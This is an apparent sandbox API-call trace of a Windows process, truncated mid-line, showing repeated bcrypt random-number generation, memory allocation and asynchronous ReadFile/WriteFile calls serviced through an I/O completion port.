LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.594] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.595] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.595] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.595] free (_Block=0x3e305b8) [0150.595] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.595] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.595] free (_Block=0x1fa91d0) [0150.595] free (_Block=0x1fa2ed8) [0150.595] free (_Block=0x1fa90b8) [0150.596] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.598] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.610] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc37e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.627] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x662a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.642] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4124, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.643] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.644] CloseHandle (hObject=0x308) returned 1 [0150.644] free (_Block=0x3df0008) [0150.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.654] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.654] free (_Block=0x3e305b8) [0150.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.654] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.655] free (_Block=0x1fa91d0) [0150.655] free (_Block=0x1fa2ed8) [0150.655] free (_Block=0x1fa90b8) [0150.655] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.656] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.695] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x35bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.696] CloseHandle (hObject=0x308) returned 1 [0150.696] free (_Block=0x3df0008) [0150.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.714] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.714] free (_Block=0x3e305b8) [0150.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.714] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.715] free (_Block=0x1fa91d0) [0150.715] free (_Block=0x1fa2ed8) [0150.715] free (_Block=0x1fa90b8) [0150.715] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.730] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.744] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1484, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.756] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x27b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.772] CloseHandle (hObject=0xec) returned 1 [0150.772] free (_Block=0x3d70450) [0150.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.779] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2004, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.809] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.809] free (_Block=0x3e305b8) [0150.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.809] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.809] free (_Block=0x1fa91d0) [0150.809] free (_Block=0x1fa2ed8) [0150.809] free (_Block=0x1fa90b8) [0150.809] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.823] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.823] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.823] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.823] free (_Block=0x3e305b8) [0150.823] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.823] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.824] free (_Block=0x1fa91d0) [0150.824] free (_Block=0x1fa2ed8) [0150.824] free (_Block=0x1fa90b8) [0150.824] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0150.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.828] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0150.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0150.829] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.829] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.829] free (_Block=0x3e305b8) [0150.829] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.829] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.830] free (_Block=0x1fa91d0) [0150.830] free (_Block=0x1fa2ed8) [0150.830] free (_Block=0x1fa90b8) [0150.830] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.830] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0151.968] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5398, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0151.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0151.981] CloseHandle (hObject=0x3cc) returned 1 [0151.981] free (_Block=0x3d70450) [0151.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0151.994] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x273e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0152.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0152.016] WriteFile (in: hFile=0x2a4, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0152.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0153.885] CloseHandle (hObject=0x2a4) returned 1 [0153.885] free (_Block=0x3f70048) [0153.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0153.886] CloseHandle (hObject=0x2a8) returned 1 [0153.886] free (_Block=0x3fb00b8) [0153.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0153.890] CloseHandle (hObject=0x3cc) returned 1 [0153.890] free (_Block=0x3e70008) [0153.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0153.896] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xda0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0153.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0153.896] CloseHandle (hObject=0x338) returned 1 [0153.896] free (_Block=0x1ff1e60) [0153.896] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0153.988] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.002] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.002] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.002] free (_Block=0x3e305b8) [0154.002] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.002] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.003] free (_Block=0x1fa91d0) [0154.003] free (_Block=0x1fa2ed8) [0154.003] free (_Block=0x1fa90b8) [0154.003] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0154.003] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.016] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.016] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.017] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.017] free (_Block=0x3e305b8) [0154.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.017] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.017] free (_Block=0x1fa91d0) [0154.017] free (_Block=0x1fa2ed8) [0154.018] free (_Block=0x1fa90b8) [0154.018] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.027] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0154.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.028] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0154.028] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.028] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.028] free (_Block=0x3e305b8) [0154.028] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.028] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.029] free (_Block=0x1fa91d0) [0154.029] free (_Block=0x1fa2ed8) [0154.029] free (_Block=0x1fa90b8) [0154.029] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.035] CloseHandle (hObject=0x338) returned 1 [0154.035] free (_Block=0x1ff1e60) [0154.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0154.048] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.049] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 